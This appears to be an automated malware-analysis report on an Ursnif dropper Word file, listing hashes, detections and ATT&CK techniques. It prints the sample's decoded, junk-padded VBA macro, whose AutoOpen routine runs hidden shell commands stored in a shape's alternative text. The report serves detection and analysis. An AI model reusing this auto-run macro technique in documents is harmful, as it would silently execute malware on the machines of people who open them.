Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 1f4d350cb3a6542b…

MALICIOUS

Office (OLE)

74.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 3f7560ff6f0507b3f16fbf6e5f727348 SHA-1: 1dbdf1f238573f641b691ef2c9c0f63e2e3a645b SHA-256: 1f4d350cb3a6542b9a74431276554c484e80089f4c263f1d4456c88aa8942641
202 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating a known Ursnif variant. The presence of a critical 'Shell()' call within the VBA macros, specifically triggered by the 'AutoOpen' function, strongly suggests the macro is intended to execute arbitrary commands. This functionality is typical for droppers that download and execute further malicious stages.

Heuristics 6

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3412 bytes
SHA-256: 243b68023a1832a04cc334973c6dde46ce7b33ed2a87ac5b1029254f28367f4b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wjohoty"
Function zwyvagaquv()


Dim uxqutZXf As Integer

Dim nZOCxMfS As Long

uxqutZXf = 6438 + 5413

Dim pDAeeV As Integer

Dim MpljD As Long

pDAeeV = 3969 + 2089

Dim RIhth As Integer
Dim rwemiwowy As Long
RIhth = 6519 + 6069

Dim bSxkMShz As Integer

Dim pGxsV As Long

bSxkMShz = 2305 + 2860

Dim XjfzK As Integer

Dim qmygali As Long

XjfzK = 6881 + 6590

Dim htih As Integer
Dim RGxJvC As Long
htih = 9303 + 8776

Dim nczHY As Integer

Dim KiMNQO As Long

nczHY = 5269 + 2935

Dim qfija As Integer

Dim dwocan As Long

qfija = 4668 + 5466

Dim gfebekito As Integer
Dim kgatyqud As Long
gfebekito = 9269 + 8141

bjov = "szupocaru"


Dim xtyqubolik As Integer

Dim pgic As Long

xtyqubolik = 6999 + 1620

Dim djehugo As Integer

Dim bgiq As Long

djehugo = 1631 + 7990

Dim vvanawozy As Integer
Dim rtawac As Long
vvanawozy = 7213 + 4709

Dim vropefusebu As Integer

Dim ckubiwup As Long

vropefusebu = 2357 + 9097

Dim gresowu As Integer

Dim CdrjUMB As Long

gresowu = 9046 + 6312

Dim mfusakabu As Integer
Dim WlvNjhN As Long
mfusakabu = 3437 + 6494

Dim bpuzozexi As Integer

Dim sdajipami As Long

bpuzozexi = 1801 + 2179

Dim pDARX As Integer

Dim JIlHSk As Long

pDARX = 4720 + 2534

Dim WUDSMM As Integer
Dim oODqIrs As Long
WUDSMM = 4775 + 3528

Set zwyvagaquv = ActiveDocument.Shapes(bjov)


End Function
Sub AutoOpen()


Dim BBqkrlf As Integer

Dim qjum As Long

BBqkrlf = 5417 + 4007

Dim zfivyxapa As Integer

Dim gquhirisy As Long

zfivyxapa = 1788 + 8559

Dim EFlZfrao As Integer
Dim qhuc As Long
EFlZfrao = 6599 + 4483

Dim vkemukezoq As Integer

Dim nmxVsYpH As Long

vkemukezoq = 7385 + 9310

Dim FlhJu As Integer

Dim qloxyc As Long

FlhJu = 3537 + 4109

Dim fgiqonimofe As Integer
Dim ssucawejeje As Long
fgiqonimofe = 8650 + 9316

Set msynirepy = zwyvagaquv


Dim gwewetohy As Integer

Dim AHkGoQhV As Long

gwewetohy = 5921 + 7747

Dim cyyhCEuv As Integer

Dim TUedbL As Long

cyyhCEuv = 6535 + 5152

Dim wcuduhutywe As Integer
Dim RzRFdLiY As Long
wcuduhutywe = 6911 + 7826

Interaction.Shell$ _
msynirepy.AlternativeText, vbHide


Dim QLQew As Integer

Dim wtymo As Long

QLQew = 4456 + 7847

Dim rsysutemefa As Integer

Dim jqecu As Long

rsysutemefa = 5838 + 1792

Dim QjjBof As Integer
Dim gXLJPRxC As Long
QjjBof = 7786 + 1883

Dim gYtWMi As Integer

Dim YfxmXGV As Long

gYtWMi = 6712 + 5707

Dim lcXeA As Integer

Dim sbaqel As Long

lcXeA = 7895 + 8340

Dim nnuxowon As Integer
Dim xbapadivuvi As Long
nnuxowon = 2233 + 1810

Dim rpAoR As Integer

Dim oUDtZyCg As Long

rpAoR = 5602 + 6312

Dim zhyxu As Integer

Dim ctan As Long

zhyxu = 7212 + 8242

Dim rkuruvy As Integer
Dim smysisug As Long
rkuruvy = 3954 + 1328

Dim afhpipk As Integer

Dim hkycy As Long

afhpipk = 3887 + 5835

Dim wtapasel As Integer

Dim vJhHxdS As Long

wtapasel = 6006 + 8804

Dim hxopotu As Integer
Dim ZNzpSv As Long
hxopotu = 8870 + 2018

End Sub